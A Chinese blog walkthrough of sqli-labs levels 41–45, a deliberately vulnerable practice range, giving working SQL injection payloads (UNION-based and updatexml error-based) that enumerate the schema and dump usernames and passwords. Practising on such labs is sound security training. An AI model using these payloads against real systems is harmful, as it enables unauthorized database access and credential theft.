sqli-labs靶场通关攻略 41-45

云舒zovn2024-08-29 13:54

主页有sqli-labs靶场通关攻略 1-40

第四一关 less-41

步骤一:查询闭合方式

?id=1 --+

步骤二:查询数据库

?id=-1 union select 1,2,database()--+

步骤三:查看表名

?id=-1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()--+

步骤四:查看users表列名

?id=-1 union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users' --+

步骤五:查看users表信息

?id=-1 union select 1,2,group_concat(id,username,password) from users --+

第四二关 less-42

步骤一:登录页面

步骤二:查询数据库

密码框输入:'and updatexml(1,concat(0x7e,(select database()),0x7e),1) -- aaa

步骤三:查看表名

密码框输入:'and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database() ),0x7e),1) -- aaa

步骤四:查看users表列名

密码框输入:'and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_sche ma.columns where table_name='users' ),0x7e),1) -- aaa

第四三关 less-43

步骤一:登录页面

步骤二:查询数据库

密码框输入:') and updatexml(1,concat(0x7e,(select database()),0x7e),1) -- aaa

步骤三:查看表名

密码框输入:') and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database() ),0x7e),1) -- aaa

步骤四:查看users表列名

密码框输入:') and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users' ),0x7e),1) -- aaa

第四四关 less-44

步骤一:登录页面

步骤二:查询数据库

密码框输入:1' union select 1,database(),3 #

步骤三:查看表名

密码框输入:1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' #

步骤四:查看users表列名

密码框输入:1' union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users' #

步骤五:查看表中信息

1' union select 1,group_concat(username,password),3 from users #

第四五关 less-45

步骤一:登录页面

步骤二:查询数据库

密码框输入:1') union select 1,database(),3 #

步骤三:查看表名

密码框输入:1') union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' #

步骤四:查看users表列名

密码框输入:1') union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users' #

相关推荐
自身就是太阳12 分钟前
深入理解 Spring 事务管理及其配置
java·开发语言·数据库·spring
不惑_20 分钟前
初识 performance_schema:轻松掌握MySQL性能监控
数据库·mysql
Gauss松鼠会28 分钟前
GaussDB关键技术原理:高弹性(四)
java·大数据·网络·数据库·分布式·gaussdb
Aries2631 小时前
Spring事务传播行为详解
java·数据库·spring
code.song1 小时前
电影评论|基于springBoot的电影评论网站设计与实现(附项目源码+论文+数据库)
数据库·spring boot·后端
Dovir多多2 小时前
渗透测试入门学习——php与mysql数据库连接、使用session完成简单的用户注册、登录
前端·数据库·后端·mysql·安全·html·php
二十雨辰3 小时前
[苍穹外卖]-09Spring Task定时任务
java·数据库·spring
科研小白_d.s3 小时前
数据库课程设计mysql
数据库·mysql·课程设计
code.song3 小时前
校园社团|基于springBoot的校园社团信息管理系统设计与实现(附项目源码+论文+数据库)
数据库·spring boot·后端
code.song3 小时前
医疗报销|基于springBoot的医疗报销系统设计与实现(附项目源码+论文+数据库)
数据库·spring boot·后端
热门推荐
01RAG 实践- Ollama+RagFlow 部署本地知识库02组基轨迹建模 GBTM的介绍与实现(Stata 或 R)032024年高教社杯数学建模国赛C题超详细解题思路分析04CANoe Trace窗口过滤栏消失的几种解决方法(附上最终解决方案)05苍穹外卖面试总结06【2024数模国赛赛题思路公开】国赛B题思路丨附可运行代码丨无偿自提07【立创EDA-PCB设计基础】6.布线铺铜实战及细节详解08Coze扣子平台完整体验和实践(附国内和国际版对比)09【2024高教社杯全国大学生数学建模竞赛】B题 生产过程中的决策问题——解题思路 代码 论文10CCF-CSP认证考试 202406-3 文本分词 100分题解